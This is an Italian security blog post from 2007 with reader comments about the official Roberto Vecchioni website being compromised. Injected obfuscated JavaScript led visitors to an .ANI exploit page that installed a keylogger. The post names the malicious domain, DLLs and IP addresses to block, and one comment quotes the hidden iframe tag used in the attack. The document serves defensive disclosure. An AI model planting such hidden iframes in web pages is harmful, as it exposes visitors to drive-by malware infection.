Roberto Vecchioni vittima della vulnerabilità ANI

Il sito ufficiale del cantautore italiano Roberto Vecchioni è stato nei giorni scorsi attaccato. Infatti, la home page ufficiale includeva uno script che scaricava del malware all’interno del PC.

Il codice del sito web conteva del codice JavaScript offuscato, che sembrerebbe essere stato inserito da qualche attacker riuscito a modificare la pagina web.

IL JavaScript, una volta decodificato - la tecnica era particolarmente semplice - caricava un altro sito web, dramcnt.com (194.146.207.23), ospitato in Russia, dall’ISP NEVACON LTD.

Qui viene caricata una pagina html che contiene un exploit per la nuovissima - e gia patchata - vulnerabilità di Windows relativa ai file .ANI e altri JavaScript offuscati. Il tutto necessario a scaricare un malware dalle dimensioni di 29,112 bytes.

Il file è un trojan downloader che installa nel PC un keylogger, sottoforma di due dll denominate ibm00001.dll e ibm00002.dll all’interno della directory C:\Programmi\File Comuni\Microsoft Shared\Web Folders\.

Al momento Prevx1 individua e rimuove correttamente la minaccia. Ho contattato personalmente il webmaster del sito web con urgenza oggi pomeriggio - visto che il sito web è molto visitato, essendo il sito ufficiale di un importante cantautore italiano - la quale ha risolto questa sera il problema. Il sito è dunque di nuovo visitabile senza incorrere in nessun rischio.

Ringrazio Andrea per la segnalazione del problema.

*** UPDATE ***

il sito è stato di nuovo attaccato ed é nuovamente infetto. Sono in contatto con il webmaster per tentare di risolvere il problema. Il sito é stato messo in mattinata offline .
Il messaggio in home page:

*** UPDATE (2) - 29/04/2007 ***

Anche la pagina di offline risulta nuovamente infetta. Raccomando il blocco dei seguenti indirizzi IP per chi ancora non l’avesse fatto:

194.146.207.23
58.65.239.180
81.95.149.114
64.62.137.149

Gli utenti di Prevx sono protetti dalla minaccia.

Scritto il 25 Aprile 2007


43 Responses to “Roberto Vecchioni vittima della vulnerabilità ANI”


  1. m4v3rick
    Aprile 25th, 2007 at 15:39

    questo iframe src=’http://58.65.239.180/’ width=’1′ height=’1′ style=’visibility: hidden;’>


  2. m4v3rick
    Aprile 25th, 2007 at 15:41

    e punta a questo ip 81.95.149.114 che è nella mia blacklist antigromozon da una vita


  3. Marco
    Aprile 25th, 2007 at 16:05

    eh scusa? :D


  4. TNT
    Aprile 25th, 2007 at 18:03

    Mi chiedo quanto sia rimasta su. Un ulteriore prova, comunque, che il famoso e ridicolo “basta navigare su siti sicuri e non si prendono virus” che alcuni tuttoggi continuano ad affermare e’ un’emerita scempiaggine. :)


  5. m4v3rick
    Aprile 25th, 2007 at 19:36

    @ marco :cosa c’è che non hai capito? :-D


  6. m4v3rick
    Aprile 25th, 2007 at 20:33

    Magari è normale che il sito di Vecchioni contenga un iframe con ip di Hong Kong che poi se digitato nel browser ci porti dritti dritti in russia dove c’è uno script che ci attende paziente. :-)


  7. TNT
    Aprile 25th, 2007 at 20:41

    Marco, quei banner pubblicitari linkano spesso e volentieri a upspiral.com, distributore di adware… :\


  8. m4v3rick
    Aprile 25th, 2007 at 21:21

    su upspiral ci sono capitato spesso quando davo un’occhiata alle famose pagine civetta


  9. Alfonso Maruccia aka The King of GnG
    Aprile 25th, 2007 at 22:06

    Ehm, Marco, guarda che quella schifezza di exploit è ancora presente sul sito web: di solito lavoro con Firefox 2, ma facendo l’accesso con Internet Explorer 6 è tutto un risuonare di sirene di antivirus e sistema di protezione HIPS della mia macchina……


  10. TNT
    Aprile 25th, 2007 at 22:10

    Secondo me lo hanno “hackato” di nuovo. :\


  11. m4v3rick
    Aprile 25th, 2007 at 22:13

    ma va? :-D :-D :-D


  12. m4v3rick
    Aprile 25th, 2007 at 22:14

    non solo, stanno spostando il redirect :-D


  13. m4v3rick
    Aprile 25th, 2007 at 22:17

    non è che leggono qui? Nooooo per carita’
    figuriamoci. Queste personcine per bene figurati se leggono questo blog.


  14. TNT
    Aprile 25th, 2007 at 22:17

    Certo che certi “webmaster” invece di togliere il link e rimettere subito tutto come prima farebbero meglio a vedere come mai e’ stato compromesso il sito, IMHO.


  15. Marco
    Aprile 25th, 2007 at 22:17

    si, lo hanno hackato di nuovo.

    @Alfonso: non c’è ancora, c’è di nuovo ;) è piu corretto :) Oggi pomeriggio non sono stato online per cui non ho visto.

    @maverick: non hai nella blacklist l’iframe originale. Questo nuovo lo vedo ora poiche prima, come detto, non ero online. Non avevo capito perche ti stai riferendo ad una cosa differente rispetto a quello che dice il mio articolo. Se ti attieni all’articolo bene, se cambi poi è ovvio che non ti capisco :D Quando hai scritto non ero in casa per cui non ho controllato il sito web e tu non avevi specificato si trattasse di un iframe differente da quello esposto negli screen :) Fino a questa mattina era pulito, ieri era infetto dall’altro iframe.

    @TNT: esatto, hackato di nuovo. Come vedi infatti gli screen sono relativi ad un altro iframe che c’era prima.


  16. TNT
    Aprile 25th, 2007 at 22:20

    Maverick, mah, forse. Spesso queste vulnerabilita’ di siti web fatti con gli ani :D sono talmente facili da sfruttare che ci sono script su server maligni che le sfruttano continuamente, ripristinando la pagina malefica appena viene sistemata.


  17. maverick
    Aprile 25th, 2007 at 22:30

    “Certo che certi “webmaster” invece di togliere il link e rimettere subito tutto come prima farebbero meglio a vedere come mai e’ stato compromesso il sito, IMHO”

    Parole sante :-D


  18. Andrea (Teliqalipukt)
    Aprile 26th, 2007 at 08:28

    Con IE compare un messaggio: “Il sito web sta tentando di eseguire il componente aggiuntivo ‘outlook.exe’…

    Marco, si tratta della stessa infezione o di una diversa?

    Comunque, come al solito, ottimo lavoro :-)


  19. Marco
    Aprile 26th, 2007 at 10:33

    Ci stanno lavorando. Il sito é stato messo offline.


  20. Fabrizio Alberti
    Aprile 26th, 2007 at 21:39

    Marco, non mi spiego come possono “attaccare” il sito, senza iniettare del codice infetto.

    Puoi spiegarmelo semplicemente?


  21. Marco
    Aprile 26th, 2007 at 23:02

    Dunque, l’articolo è stato scritto ovviamente per cercare di parlare il piu comprensibile a tutti.

    Molto probabilmente, tra le piu gravi che ci possono essere come possibilità, un bug in qualche servizio utilizzato nel server (magari non aggiornato) che ha permesso l’utilizzo di qualche exploit. Altrimenti potrebbe essere che il sito soffre di attacchi di tipo XSS o SQL injection. In entrambi i casi ovviamente c’è bisogno di aver accesso fisico al server, accesso che è possibile acquisire direttamente da servizi buggati o, in maniera più ridotta e quindi limitato al solo spazio web (se i permessi sono correttamente configurati ovviamente, parlo di una corretta configurazione dalla base) attraverso falle del sito web mal progettato.


  22. michele
    Aprile 27th, 2007 at 13:00

    E poi vengono a dire che linux è sicuro, ma per favore… la maggior parte dei siti hackerati o che inviano malware sono server linux (vedi per es. 81.95.149.114)


  23. michele
    Aprile 27th, 2007 at 13:01

    81.95.149.114

    HTTP - 80 HTTP/1.1 200 OK
    Date: Fri, 27 Apr 2007 11:57:02 GMT
    Server: Apache/1.3.37 (Unix)


  24. TNT
    Aprile 27th, 2007 at 15:25

    Michele, risparmiaci la trollata, per favore. Non hai la piu’ pallida idea di come sia configurato quel server, se sia aggiornato, se la vulnerabilita’ risieda nell’implementazione del sito o del software. Per cui evita certe scempiaggini.


  25. TNT
    Aprile 27th, 2007 at 15:26

    Ah e poi “e che inviano malware”? Se un server invia malware significa che non e’ sicuro? Ridicolo.


  26. m4v3rick
    Aprile 27th, 2007 at 16:02

    il sito che manda il malware è sicurissimo perche’ è di quella gang.
    Quello non è hackerato ma fa quello che deve fare: ovvero infettare
    le perosne
    Mentre il sito di vecchioni era ospitato su sever win2k.
    Ma non facciamo guerre di religioni per favore.
    Comunque michele mi sa che non hai capito come funzionano gli attacchi di questo tipo.
    I server che contengono i malware sono ben noti e quasi tutti sono in russia ed ucraina


  27. TNT
    Aprile 27th, 2007 at 16:05

    Beh, mi pare evidente che uno che afferma che un server che invia malware “non e’ sicuro” non conosce molto bene cio’ di cui parla. :(


  28. m4v3rick
    Aprile 27th, 2007 at 16:09

    beh visto che non è sicuro gli passo un po’ di Ip e così ci elimina alla fonte un po’ di spazzatura che viene dall’est :-D


  29. m4v3rick
    Aprile 27th, 2007 at 16:21

    ah ho scritto al webmaster del sito e gli ho consigliato di linkare questa pagina e il tool prevx in modo che chi è stato infettato possa
    sistemare il pc


  30. m4v3rick
    Aprile 27th, 2007 at 20:10

    google ci dice che il sito di vecchioni potrebbe danneggiare il pc.
    :-D


  31. Fabrizio Alberti
    Aprile 27th, 2007 at 20:24

    @marco: grazie mille, pensavo qualcosa del genere in effetti non mi era chiaro da come avevi impostato l’articolo, mi pareva tutt’altro.

    @michele: senza voler fare polemica, ne guerre di religione, ti consiglio di dare un occhio a questo sito, per sincerarti di quel che stai affermando: http://toolbar.netcraft.com/site_report?url=http://www.vecchioni.it
    Inoltre ti faccio notare, che l’IP che hai indicato, è quello relativo al sito che spara malware, non quello del sito di vecchioni.

    Saluti


  32. Danilo
    Aprile 29th, 2007 at 17:56

    Scusate ma sono un po’ niubbo di blocchi…nell’update della notizia datato oggi ci sono degli ip che l’autore dice di bloccare…come si fa? Grazie e scusate per la domanda stupida…


  33. m4v3rick
    Aprile 29th, 2007 at 21:07

    li blocchi con un firewall o con programmi tipo protowall o peerguardian2. se vuoi essere maggiormente protetto puoi dare un’occhiata alla blacklist del mio blog maipiugromozon.blogspot.com


  34. Danilo
    Aprile 30th, 2007 at 09:53

    Io ho zone alarm versione free…ma non vedo impostazioni dove inserire ip da bloccare…


  35. m4v3rick
    Aprile 30th, 2007 at 10:32

    beh allora usa protowall che è molto leggero e si installa come servizio. ZonaAlarm non l’ho mai usato. I programmi dovrebbero essere compatibili. http://www.bluetack.co.uk/
    c’è pure il vido che spiega come si installa sulla sinistra per ha bisogno di un intervento nel panello di controllo.
    Altrimenti smanetti con ZA o cambi firewall


  36. PC Al Sicuro » Blog Archive » Intrusione nei sistemi Hosting Solutions
    Aprile 30th, 2007 at 18:07

    […] In riferimento al caso del noto cantante italiano Roberto Vecchioni, già analizzato precedentemente qui, ho avuto modo di andare un pò più a fondo sulla questione e mi sono accorto di qualcosa che sembrerebbe ben più grave. […]


  37. Pin
    Maggio 2nd, 2007 at 10:59

    Ciao a tutti,
    abbiamo rilevato anche noi l’attacco su diversi siti da noi gestiti.
    La particolarità è che i nostri siti, come quello di vecchioni, sono appoggiati presso lo stesso provider/mantainer.

    Che si fa?


  38. Marco
    Maggio 2nd, 2007 at 11:41

    Ciao :)

    Guarda qui: http://www.pcalsicuro.com/main/2007/04/possibile-intrusione-nei-sistemi-hosting-solutions/


  39. Maurizio
    Maggio 2nd, 2007 at 20:05

    Stesso problema: circa 15 sito infetti, stesso provider e per di più non posso connettermi in ftp perchè non funziona.


  40. Wich
    Maggio 9th, 2007 at 16:53

    Ciao a tutti,
    anche i siti che amministro come webmaster e che sono ospitati tutti da Hosting Solutions hanno subito attacchi simili nei giorni scorsi.
    La colpa non è dei webmaster (noi clienti di HS) ma di una piccola falla (ma un buco emorme per un buon hacker) nella sicurezza dei server che ha causato parecchi danni agli ignari visitatori.
    Vi confermo che Hosting Solutions ha risolto i problemi di sicurezza e cambiato tutte le password per l’accesso ftp agli spazi web dei propri clienti (proprio l’accesso ai db degli utenti ftp ha permesso agli hacker di modificare il codice di molte pagine appartenenti a svariati domini).
    Concludo con il dire che Hosting Solutions in questo caso ha “toppato” in termini di sicurezza, ma resta comunque uno dei più affidabili servizi di hosting presenti in Italia.

    Wich


  41. Marco
    Maggio 9th, 2007 at 17:06

    Assolutamente, mai messa in dubbio l’ultima tua frase :)

    Per il resto, era abbastanza evidente che si trattasse di una falla del server, avrei voluto sapere solo se si tratta di falla direttamente accedibile dall’esterno (cioè, configurazione errata di qualche servizio ad esempio) o configurazione interna del servizio (in questo caso avrebbero dovuto trovare una falla in qualche sito web e poi da lì muoversi all’interno).

    Fa comunque piacere che Hosting Solutions abba cambiato le password agli utenti automaticamente, non lasciando l’utente stesso in balìa di sé stesso.


  42. PC Al Sicuro » Blog Archive » Possibile intrusione nei sistemi Aruba
    Giugno 16th, 2007 at 13:24

    […] Si raccomanda al momento di bloccare i seguenti indirizzi IP, oltre a quelli che avevo già comunicato nell’articolo pubblicato riguardo l’intrusione nel sito web di Roberto Vecchioni: 58.65.239.180 (già inserito nella pagina sopra linkata) 64.38.33.13 194.146.207.129 […]


  43. Possibile intrusione nei sistemi Aruba « The Alexsandra Spaces
    Giugno 24th, 2007 at 17:50

    […] Si raccomanda al momento di bloccare i seguenti indirizzi IP, oltre a quelli che avevo già comunicato nell’articolo pubblicato riguardo l’intrusione nel sito web di Roberto Vecchioni: 58.65.239.180 (già inserito nella pagina sopra linkata) 64.38.33.13 194.146.207.129 194.146.207.18 […]

Lascia un commento

« Variante di Rootkit.DialCall
Next: Possibile intrusione nei sistemi Hosting Solutions »